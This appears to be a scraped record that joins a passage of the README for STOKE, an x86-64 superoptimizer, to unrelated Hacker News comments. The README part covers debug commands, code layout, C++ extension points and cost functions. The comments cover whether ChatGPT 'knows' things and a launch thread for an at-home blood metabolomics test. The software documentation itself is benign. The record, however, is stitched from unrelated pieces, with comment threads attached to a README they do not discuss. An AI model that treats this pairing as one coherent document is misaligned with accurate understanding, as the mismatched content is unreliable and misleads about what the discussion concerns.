described above, STOKE has facilities for\ndebugging and benchmarking the performance of each of its core components. 
See `stoke --help` for an up-to-date list.\n\n- `stoke debug cfg`: Generate a pdf of a control flow graph.\n- `stoke debug cost`: Compute the cost of a rewrite.\n- `stoke debug diff`: Diff the resulting state of two functions.\n- `stoke debug effect`: Show the effect of a function on the state.\n- `stoke debug formula`: Show the SMT formula for a straight-line piece of code.\n- `stoke debug sandbox`: Step through the execution of a rewrite.\n- `stoke debug search`: View the changes produced by performing and undoing a program transformation.\n- `stoke debug simplify`: Take an x86 program and simplify it (by removing redundant instructions).\n- `stoke debug state`: Check the behavior of operators that manipulate hardware machine states.\n- `stoke debug tunit`: Show the instruction sizes and RIP-offsets for a code.\n- `stoke debug verify`: Check the equivalence of two programs.\n- `stoke benchmark cfg`: Measure the time required to recompute a control flow graph.\n- `stoke benchmark cost`: Measure the time required to compute a cost function.\n- `stoke benchmark sandbox`: Measure the time required to execute a program in a STOKE sandbox.\n- `stoke benchmark search`: Measure the time required to perform and undo a transformation to a program.\n- `stoke benchmark state`: Measure the time required to reset the memory of a hardware machine state.\n- `stoke benchmark verify`: Measure the time required to check the equivalence of two programs.\n\nShell completion\n-----\n\nSTOKE also comes with support for bash and zsh completion. To enable either, type:\n\n $ make bash_completion\n $ make zsh_completion\n\nUsing functions to be proposed by STOKE\n-----\nSTOKE can not only propose instructions when searching for programs, but also propose calls to a list of known functions using the `--functions` command-line argument. To decide whether these functions read any undefined state (before proposing them), we use a dataflow analysis. Sometimes, the dataflow analysis can be too imprecise, which is why STOKE allows the user to annotate dataflow information in comments. Here is an example of a function that clears the overflow flag; STOKE's dataflow analysis is too imprecise for this code.\n\n .text\n .globl clear_of\n .type clear_of, @function\n #! maybe-read { }\n #! maybe-write { %of %r15 }\n #! maybe-undef { }\n .clear_of:\n pushfq\n popq %r15\n andq $0xfffff7ff, %r15\n pushq %r15\n popfq\n retq\n\n .size clear_of, .-clear_of\n\nNote that it is enough to specify the maybe sets, as STOKE will automatically realize that the must sets need to be contained in the maybe sets.\n\n\nUser FAQ\n=====\n\n### What is the difference between `stoke synthesize` and `stoke optimize`?\nBoth use the same core search algorithm, but in synthesis mode, STOKE starts from the empty program and tries to find a rewrite from scratch. This is great for finding implementations that are very different from the target. In optimization mode, however, STOKE starts from an initial program, usually the target. This allows STOKE to work on much longer programs (because it already starts with a correct program) and apply optimizations to that program.\n\n### `stoke replace` errors with `New function has N bytes, but the old one had M`. 
What does that mean?\n\nRight now, `stoke replace` has a limitation where it can only replace a function if the old implementation is at least the size (in bytes) of the new implementation.\n\nIf you still want to use `stoke replace`, and if you control the compilation of the binary, a workaround is to make the old implementation artificially larger by using the compiler flag `-falign-functions=N` for some large enough `N`, say 64. In this case, the compiler will align functions at `N` bytes, which typically requires padding the functions with `nop`s. This increases the chance that `stoke replace` will succeed.\n\nDeveloper FAQ\n=====\n\n### How does the assembler work (and how do I debug it?)\nThere is a good explanation [in the issue tracker](https://github.com/StanfordPL/stoke/issues/791#issuecomment-169783865). We also have a [script to compare how gcc and the x64asm assembler assemble an instruction](https://github.com/StanfordPL/stoke/issues/803).\n\n### How can I run STOKE in gdb?\nSTOKE's sandbox catches SIGFPEs, and thus running STOKE's search in the sandbox causes gdb to pause very often. To keep gdb from stopping on SIGFPEs (they are almost never a problem for STOKE), run this inside gdb:\n\n handle SIGFPE nostop noprint\n\nYou can enable this by default by running the following command:\n\n echo \"handle SIGFPE nostop noprint\" > .gdbinit\n\n\n\nExtending STOKE\n=====\n\nThis repository contains a minimal implementation of STOKE as described in\nthe academic papers about STOKE. Most, but not all, of the features\ndescribed in those papers appear here. Developers who\nare interested in refining these features or adding their own extensions are\nencouraged to try modifying this implementation as described below.\n\nCode Organization\n-----\n\nThe STOKE source is organized into modules, each of which corresponds to a\nsubdirectory of the `src/` directory:\n\n- `src/analysis`: An aliasing analysis used by the validator.\n- `src/cfg`: Control flow graph representation and program analysis.\n- `src/cost`: Different cost functions that can be used in the search.\n- `src/disassembler`: Runs objdump and parses the results into STOKE's format.\n- `src/expr`: A helper used to parse arithmetic expressions in config files.\n- `src/ext`: External dependencies.\n- `src/sandbox`: A sandbox for testing proposed code on the hardware.\n- `src/search`: An implementation of an MCMC-like algorithm for search.\n- `src/state`: Data structures to represent concrete machine states (testcases).\n- `src/stategen`: Generates concrete machine states (testcases) for a piece of code.\n- `src/symstate`: Models the symbolic state of the hardware; only used by the formal validator.\n- `src/target`: Code to find which instruction sets the CPU supports.\n- `src/transform`: Transforms used during search to mutate the code.\n- `src/tunit`: Classes for representing a function (x86-64 code along with a name and other metadata).\n- `src/verifier`: Wrappers around verification techniques such as testing for formal validation.\n- `src/validator`: The formal validator for proving two codes equivalent.\n\nThe `tools/` directory has the code that performs application logic and reads\ncommand line arguments.\n\n- `tools/apps`: The application logic for stoke binaries\n- `tools/args`: Lists of command line arguments used by a gadget (see below).\n- `tools/gadgets`: Modules used by applications to configure internal APIs with command line arguments.\n- `tools/io`: Code to read/write certain kinds of command line arguments.\n- 
`tools/scripts`: Where we put stuff when we don't have a better place. Nothing to see here.\n- `tools/target`: Arbitrarily named directory with code to read CPU features from cpuinfo.\n\nGadgets\n-----\n\nThe stoke codebase is set up in a very modular way. We have components like the\n`Sandbox`, which emulates execution of a rewrite on hardware; subclasses of\n`CostFunction`, which evaluate the quality of a rewrite; and an `SMTSolver`,\nwhich is used by the formal validator to query a backend\nlike Z3 or CVC4. \n\nOften, several stoke applications will wish to configure one of these modules\nin the same way, depending on command line arguments. Thus, we have \"Gadgets\".\nA \"Gadget\" is a subclass of the class you wish to configure that takes care of\nextracting all the appropriate command line arguments. Some Gadgets, like\n`SandboxGadget`, just define a constructor that modifies the object's\nconfiguration. More involved ones, like `CostFunctionGadget`, actually do work\nto create a new `CostFunction` object and define methods that act as a wrapper.\n\nTherefore, if you want to add a command line option to an existing component of\nstoke, you will normally want to modify the gadget for that component\nin `tools/gadgets` and add the argument in `tools/args`. Once you do that, it\nshould show up uniformly in all of the stoke tools that use that module.\n\nInitial Search State\n-----\n\nInitial state types are defined in `src/search/init.h` along with an additional\ntype for user-defined extensions.\n\n```c++\nenum class Init {\n EMPTY,\n ZERO,\n TARGET,\n PREVIOUS,\n\n // Add user-defined extensions here ...\n EXTENSION\n};\n```\n\nInitial state is specified using the `--init` command line argument, which controls the initial values\ngiven to the current, lowest cost, and lowest cost correct search states. This value\naffects the behavior of the `Search::configure() const` method, which\ndispatches to the family of `Search::configure_xxxxx() const` methods. User-defined\nextensions should be placed in the `Search::configure_extension() const` method,\nwhich can be triggered by specifying `--init extension`.\n\n```c++\nvoid Search::configure_extension(const Cfg& target, SearchState& state) const {\n // Add user-defined logic here ...\n\n // Invariant 1: Search state should agree with target on boundary conditions.\n assert(state.current.def_ins() == target.def_ins());\n assert(state.current.live_outs() == target.live_outs());\n\n assert(state.best_yet.def_ins() == target.def_ins());\n assert(state.best_yet.live_outs() == target.live_outs());\n\n assert(state.best_correct.def_ins() == target.def_ins());\n assert(state.best_correct.live_outs() == target.live_outs());\n\n // Invariant 2: Search state must be in a valid state. This function isn't on\n // a critical path, so this can safely be accomplished by calling:\n state.current.recompute();\n state.best_yet.recompute();\n state.best_correct.recompute();\n\n // Invariant 3: Search state must agree on first instruction. This instruction\n // must be the label definition that appears in the target.\n assert(state.current.get_code()[0] == target.get_code()[0]);\n assert(state.best_yet.get_code()[0] == target.get_code()[0]);\n assert(state.best_correct.get_code()[0] == target.get_code()[0]);\n\n // See Search::configure for additional invariants\n}\n```\n\nSearch Transformations\n-----\n\nTransformation types are defined in the `src/transform` directory. Each\ntransform is a subclass of the abstract class `Transform`. 
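Each subclass implements an `operator()` that mutates a `Cfg` and returns the information needed to undo the change, as described below. As a standalone toy of that do/undo contract (none of these are STOKE's types; a \"program\" is modeled here as a vector of instruction strings purely for illustration):\n\n```c++\n// Standalone toy of the transform do/undo contract described below.\n#include <cstddef>\n#include <random>\n#include <string>\n#include <utility>\n#include <vector>\n\nstruct ToyTransformInfo {\n  bool success = false;      // transforms are allowed to fail\n  std::size_t i = 0, j = 0;  // indices of the two swapped instructions\n};\n\n// \"Global swap\": exchange two randomly chosen instructions.\nToyTransformInfo global_swap(std::vector<std::string>& code, std::mt19937& gen) {\n  ToyTransformInfo ti;\n  if (code.size() < 2) return ti;\n  ti.i = gen() % code.size();\n  ti.j = gen() % code.size();\n  std::swap(code[ti.i], code[ti.j]);\n  ti.success = true;\n  return ti;\n}\n\n// Undoing a swap replays the same swap from the saved indices.\nvoid undo(std::vector<std::string>& code, const ToyTransformInfo& ti) {\n  if (ti.success) std::swap(code[ti.i], code[ti.j]);\n}\n```\n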
The existing transforms are:\n\n| Name | Description |\n| ---- | ----------- |\n| add_nops | Adds one extra nop instruction into the rewrite. |\n| delete | Deletes one instruction at random. |\n| instruction | Replaces an instruction with another one chosen at random. |\n| opcode | Replaces an instruction's opcode with a new one that takes operands of the same type. |\n| operand | Replaces an operand of one instruction with another. |\n| rotate | Formerly \"resize\". Moves an instruction from one basic block to another, and shifts all the instructions in between. |\n| local_swap | Takes two instructions in the same basic block and swaps them. |\n| global_swap | Takes two instructions in the entire program and swaps them. |\n| weighted | Selects from among several other transforms at random. |\n\n\nThese subclasses each implement `operator()(Cfg& cfg)` to mutate a `Cfg`. This\nfunction returns an object, `TransformInfo`, that contains all the information\nneeded to undo this transformation, and also whether the transform succeeded\n(transforms are allowed to fail). It's common for this object to be set with\nindices of instructions in the code that were modified, for example. The\nsubclass also implements `undo(Cfg& cfg, TransformInfo ti)`.\n\nTransforms will often want to select from a collection of operands and opcodes,\nand for this purpose they can access the `pools_` protected variable of the\n`Transform` superclass. This is of type `TransformPools` and allows access to\nthese collections. This makes it possible to configure the collection of\navailable opcodes and operands independently of the transforms. Also, the\n`Transform` superclass has a `gen_` member which is used to produce random\nnumbers with a known seed.\n\nTransformation weights are specified using the family of `--xxxxx_mass` command\nline arguments. These values control the distribution of proposals that are\nmade by the `WeightedTransform`, which is the transform used by the\nsearch.\n\nA simple example of how to implement a transform is in\n`src/transform/global_swap.cc`. Note that all transforms must appropriately\nmake a call to recompute any `Cfg` information that needs to be updated and\nensure that `cfg.check_invariants()` returns true when done (you can assume it\nreturns true at the beginning of the function).\n\nCost Function\n-----\n\nA cost function is specified using the `--cost` command line argument. It's an\nexpression composed using standard unsigned arithmetic operators. As\nvariables, you can use several measurements of the current rewrite. The most\nimportant of these is `correctness`. The value `correctness` is (by default)\nthe number of bits that differ in the outputs of the target versus the rewrite,\nsummed across all testcases. There are some tunable options for this, for\nexample, for floating point computations. In all cases, lower cost is better.\n\nSome other important cost variables you can use are:\n\n| Name | Description |\n| ---- | ----------- |\n| binsize | The size (in bytes) of the assembled rewrite using the x64asm library. |\n| correctness | How \"correct\" the rewrite's output appears. Very configurable. |\n| size | The number of instructions in the assembled rewrite. |\n| latency | A poor-man's estimate of the rewrite latency, in clock cycles, based on the per-opcode latency table in `src/cost/tables`. |\n| measured | An estimate of running time by counting the number of instructions actually executed on the testcases. Good for loops and algorithmic improvements. 
|\n| sseavx | Returns '1' if both avx and sse instructions are used (this is usually bad!), and '0' otherwise. Often used with a multiplier like `correctness + 1000*sseavx` |\n| nongoal | Returns '1' if the code (after minimization) is found to be equivalent to one in `--non_goal`. Can also be used with a multiplier. |\n\nIn typical usage, you will combine the value of `correctness` with other values\nyou want to optimize for. A good starting point is `correctness + measured` or\n`correctness + latency` (the latter being the default). Improvements might assign\nan SSE-AVX penalty, like `correctness + latency + 10000*sseavx`.\n\nTo add a new cost function, drop a file into `src/cost` that subclasses\n`stoke::CostFunction`. Look at `src/cost/sseavx.h` for a simple example. It\ncomes down to overloading the `operator()` function to return the value you\nwant. Look at `measured.h` for an example of how to use runtime data from the\nsandbox to generate values. Then, add an entry to the map in\n`tools/gadgets/cost_function.h` so that your new function can be found on the\ncommand line.\n\nLive-out Error\n-----\n\nLive-out error measurement types are defined in `src/cost/distance.h` along with an additional type for user-defined extensions.\n\n```c++\nenum class Distance {\n HAMMING,\n ULP,\n\n // Add user-defined extensions here ...\n EXTENSION\n};\n```\n\nMeasurement type is specified using the `--distance` command line argument.\nThis value controls the behavior of the `CorrectnessCost::evaluate_distance()\nconst` method, which dispatches to the family of\n`CorrectnessCost::xxxxx_distance() const` methods, each of which represents a\nmethod for computing the distance between 64-bit values. User-defined extensions\nshould be placed in the `CostFunction::extension_distance() const` method,\nwhich can be triggered by specifying `--distance extension`.\n\n```c++\nCost CostFunction::extension_distance(uint64_t x, uint64_t y) const { \n Cost res = 0;\n\n // Add user-defined implementation here ...\n\n // Invariant 1: Return value should not exceed max_error_cost\n assert(res <= max_error_cost);\n\n return res; \n}\n```\n\nVerification Strategy\n-----\n\nThe verification strategy specifies what kind of verification to do on the\nrewrite. It's controlled using the `--strategy` command line argument. Right\nnow, the options are 'hold_out', 'straight_line', 'bounded', or 'ddec' (described\nabove).\n\nCommand Line Args\n-----\n\nCommand line arguments can be added to any of the STOKE subcommands using the\nfollowing syntax. 
Argument separators, which are printed as part of help\nmessages, are specified by defining a heading variable:\n\n```c++\nauto& heading = Heading::create(\"Heading Description:\");\n```\n\nCommand line flags are specified by declaring a `FlagArg`.\n\n```c++\nauto& flag = FlagArg::create(\"flag_name\")\n .alternate(\"alternate_flag_name\")\n .description(\"What this flag does\");\n```\n\nAny of the built-in C++ primitive types are specified by declaring a `ValueArg`.\n\n```c++\nauto& val = ValueArg<int>::create(\"value_name\")\n .alternate(\"alternate_value_name\")\n .usage(\"<int>\")\n .description(\"What this value represents\")\n .default_val(0);\n```\n\nUser-defined types are specified by additionally providing function objects that define I/O methods.\n\n```c++\nstruct T {\n int x, y, z;\n};\n\nstruct Reader {\n void operator()(istream& is, T& t) const {\n is >> t.x >> t.y >> t.z;\n }\n};\n\nstruct Writer {\n void operator()(ostream& os, const T& t) const {\n os << t.x << \" \" << t.y << \" \" << t.z;\n }\n};\n\nauto& val = ValueArg<T, Reader, Writer>::create(\"value_name\")\n .alternate(\"alternate_value_name\")\n .usage(\"<int> <int> <int>\")\n .description(\"What this value represents\")\n .default_val({0,0,0});\n```\n\nFor complex values that are better suited to being read from files, a `FileArg`\nmay be more appropriate than a `ValueArg`. The syntax is identical.\n\n```c++\nauto& val = FileArg<Complex>::create(\"value_name\")\n .alternate(\"alternate_value_name\")\n .usage(\"<path/to/file>\")\n .description(\"What this value represents\")\n .default_val(Complex());\n```\n\n\nContact\n=====\n\nQuestions and comments are encouraged. Please reach us through the GitHub issue tracker, or alternatively at `stoke-developers@lists.stanford.edu`.\n", "readme_type": "markdown", "hn_comments": "ChatGPT knows that it is a ChatGPT because it was programmed to know this. See:https://scottaaronson.blog/?p=6990#comment-1945915> I was eyeball-deep in analytic philosophyThen you should be aware (and the rest of your comment implies you are) that> does it 'know' [...] that it is writing the screenplay?hangs on there being a reasonable interpretation of \"know\" in the case of LLMs.\"Know\" is often used as a kind of shorthand in the case of inanimate objects: \"the website knew I was using Internet Explorer so it sent me the javascript workarounds\", \"the thermostat knew the temperature had reached the target so it switched the boiler off\" - perhaps shorthand for 'P was causally dominant in machine behaving like so' becoming 'machine behaved like so because it knew that P'.I think \"ChatGPT knows who directed Lost Highway because it answered 'David Lynch' when I asked it\", \"ChatGPT knows that Hitler is a touchy subject so it refused to write a review of Mein Kampf\" and so on are similar in their ascription of 'knowledge' to ChatGPT.In the same way that the thermostat is engineered to turn off the boiler when the target temperature is reached, ChatGPT is engineered to make linguistic productions that accord with its design goals, including being factually correct on matters of general knowledge and avoiding toxicity, the corpus and training providing the means of achieving these goals.Taking the above on board, ChatGPT's \"knowledge\" of indexicals doesn't seem any different from its \"knowledge\" of David Lynch or Hitler. 
The statistical relations instilled by its training make it likely to use indexicals in a way that conforms to the conventional human use of them: it 'knows' how to use indexicals. There's also a different reading of your question: \"is ChatGPT programmed specifically to take account of self-knowledge - is this special-cased in code or training?\" (which I guess it may be, since it seems informed about itself despite its training corpus dating only up to 2021). But while this may be an interesting programmer question it seems philosophically inert; either way, we're still talking about engineered thermostat knowledge. Maybe a more interesting question: what distinguishes the knowledge in \"I (as a non-LLM human - trust me!) know that David Lynch directed Lost Highway\" from the 'inanimate knowledge' exhibited by thermostats, websites, and ChatGPT? I'm crap at language. But if you told ChatGPT: \"Have Ron write a screenplay\" (or variations thereof), would it still output a screenplay or facsimile? Does this philosophical question exist for hand calculators? They accept input and \"personally\" respond to it appropriately too. To personify: What's the speaker-status of a person speaking echolalia? To religify: What's the speaker-status of the oracle at Delphi, or a person overcome by the holy spirit who starts speaking in tongues? At the end of the day it's complex mathematical algorithms making predictions about the next word in a sequence of words, based on all the sequences of words it's learned from (a snapshot of the web). It turns out that, given a sufficient amount of properly labeled data, the algorithms can build a model that makes good predictions, and thus we finally have a useful chat bot. While the user experience feels magical, it's helpful to understand what is actually under the hood to put it into perspective. I would like to believe this is possible but it reeks of snake oil and scientism, much like the microbiome nonsense that was in vogue a few years ago. Clicked through with intent to buy. Abandoned on recurring charge and too many offerings. This sounds like the pitch I got from a friend who drank the Theranos kool-aid. I was interested in signing up, but then saw that you get raw data for metabolites only with the $160/month plan. This seems as if it actually costs you $0 to provide, since you have that data as a prerequisite for doing anything. Why would you not provide that for every plan? Also, \"get basic tips\" on the lowest cost plan doesn't provide enough information to know whether it will be anything interesting or usable. I\u2019d love to try this on a regular basis. If I am travelling internationally and have my US mail forwarded to me, my concern would be a long return time for international mail. Is there a time limit in which you must receive the sample back? In 2013 the FDA shut down 23andMe's direct-to-consumer reports because they said consumers would misunderstand genetic information and \"self treat\". FWIW I thought this was a dumb decision and feel lucky that I was grandfathered into some helpful reports before the FDA put the kibosh on them. Do you think this is a risk to you? 
How will you deal with the FDA? > At no time shall your Personal Information, including blood or metabolomic data collected from you in accordance with this Privacy Policy be deemed to be an electronic health record or an electronic medical record for any purpose, including without limitation for the purpose of compliance with the Health Insurance Portability and Accountability Act of 1996. Does this mean other medical professionals can't get the data / records of these tests? Great idea. Huge longevity freak here. But why are you developing two things? 1. the blood extractor and 2. the test data processing. Seems like the blood extractor is the far riskier/more complex part and unnecessary to the main point. Unless your main point is blood extraction for numerous other tests. As I watch younger people struggle with basic stuff I think getting old is not so bad, and I wish people weren\u2019t so afraid of it. Then I get out of a chair on a bad day and make grandpa noises. I think if someone invented medical tech to repair and prevent joint injuries, and to retain cardiac function, I would sign up for those and boycott the rest. I don\u2019t need to live forever. I\u2019m pretty sure I don\u2019t have the stamina for it. I don\u2019t think most of the rest of us do either. I stopped reading Anne Rice before Armand, but if you ignore the other weird stuff, that\u2019s practically the main thesis of the books. People think they have the stamina for forever. Anyone who actually does is very, very special. Blue Mars and Green Mars dip into this too, but also consider Progress instead of the supernatural. Sometimes people have to step aside for new ideas to flourish. Do you estimate the analyte levels and then use those to calculate your summary statistics (bio age, polyamines level, etc.) or do you estimate the summary stats directly from the spec data? Very cool! Are you a wrapper for Metabolon - e.g. are they doing the untargeted work or do you all have your own LCMS farm? If you ever get interested in adding a microbial metabolites angle to this, drop me a line. Do you think the subscription value proposition in your lower tier offers compelling value to consumers? What research have you done to ensure your pricing tiers are market-appropriate? Congratulations on launch! You are using established lab gear and existing research on metabolites, which helps establish credibility. So you have a first-mover advantage in that you have learned HIPAA compliance and will be first for FDA approval. If this product was a huge success, is the thing that would make it difficult for copycats your ML-based data analysis software? Lots of ppl have sensitive data, but what could you say to customers that would give them cybersecurity comfort? The idea certainly excites me. Given the possibility that some findings might lead to the need for medication, are you going to have MDs or PAs or whoever on staff who can prescribe those? For metabolites found in very low concentrations where draw-to-draw variance is high, how do you deal with that when a person is only sending you one sample at a time? Is there ever going to be any effort to have this payable by health insurance? Are you doing anything with the feedback data? As in, someone sends you a sample, you tell them to make a behavioral change, does your advice change if future samples don't show a positive intervention effect? 
How do you know if patients comply with your recommendations?Are you going to offer genetic testing so, say, someone with high LDL or whatever can know if that's due to diet or they just lost the genetic lottery and nothing but statins can possibly help them?I think LDL is not a metabolite but since your \"what's measured\" page ends with \"more published below\" and then there is nothing below, I'm not sure what the full extent is of what you're testing for. If not LDL, presumably something you're testing for can have many sources, including genetic propensity, diet, and other environmental factors. How do you determine which of those is most causally relevant before prescribing an intervention?Some bits of the website really set off my alarm bells.Having Stanford Medicine and Cornell University logos front and center on the landing page gives the impression that these organizations endorse the product. I know it says, \"made by scientists from\" right there, but still. It gives me the impression you want to trick me into thinking you're actively affiliated with these institutions.The example advice of \"avoid bell peppers and consider adding arugula\" strikes me as unrealistically precise. I am skeptical that there's really research to support that narrow of a recommendation. Under what circumstances does a patient truly need to be told to avoid bell peppers for medical reasons?\"Vitamin D - insufficient, view our recommended brands\" makes me think this is a vector to push supplements on people under the guise of personalized recommendations. Do people really need a recommended brand of Vitamin D? How many supplements are you recommending people take?\"Also, only 15% of age-related diseases are genetic. The other 85% are related to your blood metabolome.\" Is that really true, that there are zero age-related diseases that are neither genetic nor \"related to your blood metabolome\"?\"use state-of-the-art AI to create your personalized health report and recommendations.\" Any time someone tells me they use \"state of the art\" AI, I assume it's a scam. How do you even measure that? Is there a standard benchmark for metabolome-based personalized health report generation?The overall idea seems perfectly reasonable, but this website gives me the heebie-jeebies.This sounds very interesting and I am tempted to sign up. But the biggest worry for me is the privacy of the data. There is a mention on the website that data isn't shared without consent. But that can always change in the future once VCs get involved and they are trying to maximize revenue. Or the business model changes.References:[1] Wishart DS. Metabolomics for Investigating Physiological and Pathophysiological Processes. Physiol Rev. 2019 Oct 1;99(4):1819\u201375. https://journals.physiology.org/doi/full/10.1152/physrev.000...[2] Wishart DS, Tzur D, Knox C, Eisner R, Guo AC, Young N, et al. HMDB: the Human Metabolome Database. Nucleic Acids Res. 2007 Jan;35(Database issue):D521-526. https://academic.oup.com/nar/article/35/suppl_1/D521/1109186[3] Wishart DS. Current progress in computational metabolomics. Brief Bioinform. 2007 Sep;8(5):279\u201393. https://academic.oup.com/bib/article/8/5/279/217981[4] Nordstr\u00f6m A, O\u2019Maille G, Qin C, Siuzdak G. Nonlinear data alignment for UPLC-MS and HPLC-MS based metabolomics: quantitative analysis of endogenous and exogenous metabolites in human serum. Anal Chem. 2006 May 15;78(10):3289\u201395. 
https://pubs.acs.org/doi/10.1021/ac060245f [5] Wishart DS, Guo A, Oler E, Wang F, Anjum A, Peters H, et al. HMDB 5.0: the Human Metabolome Database for 2022. Nucleic Acids Research. 2022 Jan 7;50(D1):D622\u201331. https://academic.oup.com/nar/article/50/D1/D622/6431815 [6] Ahadi, Sara, et al. \"Personal aging markers and ageotypes revealed by deep longitudinal profiling.\" Nature Medicine 26.1 (2020): 83-90. https://www.nature.com/articles/s41591-019-0719-5 [7] Pietzner, Maik, et al. \"Plasma metabolites to profile pathways in noncommunicable disease multimorbidity.\" Nature Medicine 27.3 (2021): 471-479. https://www.nature.com/articles/s41591-021-01266-0 [8] Merino, Jordi, et al. \"Metabolomics insights into early type 2 diabetes pathogenesis and detection in individuals with normal fasting glucose.\" Diabetologia 61.6 (2018): 1315-1324. https://pubmed.ncbi.nlm.nih.gov/29626220/ [9] Wang, Thomas J., et al. \"Metabolite profiles and the risk of developing diabetes.\" Nature Medicine 17.4 (2011): 448-453. https://www.nature.com/articles/nm.2307 How stable is your \"biological age\" stat? Is this more like blood glucose (can change dramatically in minutes) or A1C (takes weeks to move significantly), or is it even more stable than that? Said another way: in the extreme case where you had a subject with chrono_age = 60yrs and bio_age = 70yrs, and they were perfectly compliant with your recommended interventions, how fast could you get the bio_age measure down to 50yrs? We\u2019re developing an at-home metabolomics test that measures hundreds of \u201cmetabolites\u201d in blood, which studies have shown can inform about health status, disease risk, dietary patterns, and physical activity. Just for my own clarification, when you say at-home do you mean that the kit will diagnose the patient at home, or that they will gather samples at home and mail them to you? Pricing is too steep to pull the trigger on something so novel and whose utility, quality, and accuracy won't be obvious (or not) until a few tests are done. I'm not sure how to solve this other than to lower prices for early adopters while you establish your brand and reputation. Hi guys, first, great effort; as someone who worked in a metabolomics lab I know how amazingly sensitive and rich the information one can gather even from a small amount of blood. That said, the million dollar question you have to answer in healthy persons is \"how is this better than normal lab tests (CBC, CMP, TSH, UA)?\" For example, regarding diabetes - there is HbA1c and microalbuminuria, both of which can detect abnormal glucose years before diabetes and prevent it. If you can prove that these tests add value to the battery of already very cheap and ubiquitous tests, then you will have widespread adoption. Clinical metabolomics is a very nascent field and best of luck to you! Couple of questions: - Do you have an example of what a report looks like? - What's your turnaround time? - Do you have an option to do one test if we're unsure we want to commit to a year? - Can we do anonymized user information from the start, i.e. not providing name, address, etc. (given recent supreme court decisions, it's not off the table that one day insurance companies would be allowed to access this data)? The HNLAUNCH promo code is showing as invalid for me. Pity this is US only; any idea when/if it will be available in Europe? I'm in Germany. Do you have concerns about over-diagnosis, turning people into patients unnecessarily? 
Can this information create outsized worry and psychological impacts that exceed the potential problem that may or may not eventuate? In the US I imagine there are also insurance implications. > Moreover, every bit of information that we communicate to the users will be heavily backed by scientific evidence which we disclose in the delivered reports. Will it be possible to contact people with similar profiles to create new scientific evidence? E.g. if some marker is too low, it would be nice to work with others with the same problem to figure out how to increase the value. Congratulations on the launch. Why 1, 3, 6, or 9 tests per year? (Seems odd considering 52 weeks, or 12 months, for periodicity. Only 6 divides into 12. Maybe 1, 2, 4, 6, and 12?) > 30-min call with Stanford/Cornell scientist to go through results 9 times, or once? I have seen other industries (e.g. financial, hotel, airline) attempting to sell 'high touch' service as an upgrade. I have yet to see one that is worthwhile or is profitable. > Integration with wearables and diet tracking apps Can you describe which wearables and which diet tracking apps? As others have asked, a sample report would be lovely. > You must live in the US, be 18 years or older, and not pregnant to be participate. I think you are looking for 'Have US address'. Or, are you looking for a US address and US funds? I have a question based on what you said here: > one of our participants had a high level of phthalic acid, which can be found in plastics and cosmetics and is a chemical known to disrupt hormones in the body Does this mean that if elevated levels of some weird metabolite are found in my blood, you'll let me know? You say you measure 600 of them - does that mean you check for weird/high levels of all 600, and if you find some, they'll be in the report? Congrats on the launch! We need more folks trying to bring the tricorder to reality. I knew about DNA methylation but this novel way seems more apt for scale. \"We identified 420 metabolites...\" heh heh. Love the title. \"Take this blood test and extend your healthy lifespan.\" Sure dudes! Good luck with that. Can I bill this to an HSA? This looks awesome! I recently did a 2x/mo metabolomics experiment (https://smm-data.herokuapp.com/) and I've been wishing someone would do something like this ever since. Best of luck! Am a doctor. Have a question. What\u2019s the evidence base you\u2019re planning to use in justifying the treatment and recommendations? There\u2019s often a big divide between things that make sense to treat and things that should actually be treated. In other words, with what studies will you know if the effect is clinically significant or not? Not wanting to be antagonistic. Genuinely curious. This is exciting technology. Something I want but that does not exist is being able to test your blood with your own personal device without sending any of the data or blood over to private corporations. The corporations only sell the software. You'd be able to download different programs that analyze your current health state from blood, or any other marker. The device would be able to tell if you are at risk for any disease just from a common set of samples. I know this is kind of unrealistic, because to make better programs you need data from people. But who knows. Maybe one day we'll get there. Shame it's not available in the UK to try out. I would love to see this in combination with mental health. 
Dopamine, serotonin and cortisol are excellent trackers for this purpose. 1) Providing raw data at the lowest plan would evince more interest. It would not cost you any more. Also, the plan should allow for ad-hoc testing at a slightly lower price as a repeat customer. This way, I might set a baseline, and after I go through a bout of illness, I can measure myself incrementally. 2) A page with the markers you provide related to a specific condition would be helpful; for example, I am genetically predisposed to heart disease, and would like to keep track of those that can impact it. Medical epidemiologist here. This has such a Theranos ring to it. No response to the questions about the evidence base for claims of new predictive insights - only references to studies that provide prediction and guidance based on currently available routine blood workups and common dietary interventions. Everything \"new\" appears to be speculative and to come (perhaps) from insights based on longitudinal data collection. As I read it, the hope is that the technology will provide new predictive disease insights, but these are not established yet. So many metabolic/biochemical screens have poor prediction at the individual level. If I have misunderstood, can you cite one NEW predictive insight your technology provides with some kind of performance parameter - predictive value positive, 10 year incidence, or receiver operating curve performance? A couple of years ago I was part of a pre-accelerator group assessing the product-market fit for independent assessment of new medical technologies. The consultation revealed that most investors in new medical technologies had no idea how to evaluate the technology, didn't know that they didn't know how to assess the technology, and didn't want to pay someone else to do it. \"Your personal rate of aging. Research has shown that there is a \u201cbiological age\u201d, which might differ from a person\u2019s actual, chronological age. People who are biologically older than their real age tend to develop more health-related issues and age-related problems compared to people who are biologically young. Our platform will provide the users with estimates of their biological age, as well as their personal rate of aging across repeated time points and potential recommendations to slow down this rate.\" I question whether it's emotionally healthy for all users to have a direct measure of their aging to this degree. If I were a customer, I'd prefer to receive the actionable advice (the \"how to decrease this rate of aging\") without knowing the exact rate or my rate relative to the average. Especially if there were aspects outside of my control. If some other thing shows up as actionable but there's not really much in the metabolite data relevant to aging rate, cool - show me that stuff instead. If the data does show there are actions that I should take to reduce my rate of aging, cool - recommend me those actions. Certainly not saying one shouldn't be able to get at this data from your service, but perhaps it should be an onboarding option to not receive that level of granularity. Is \"Iollo\" pronounced like \"YOLO\"? I\u2019d love this if it came to Canada. How comfortable do you feel making these kinds of recommendations? I feel like during my lifetime overall nutritional guidance has swung on plenty of things. 
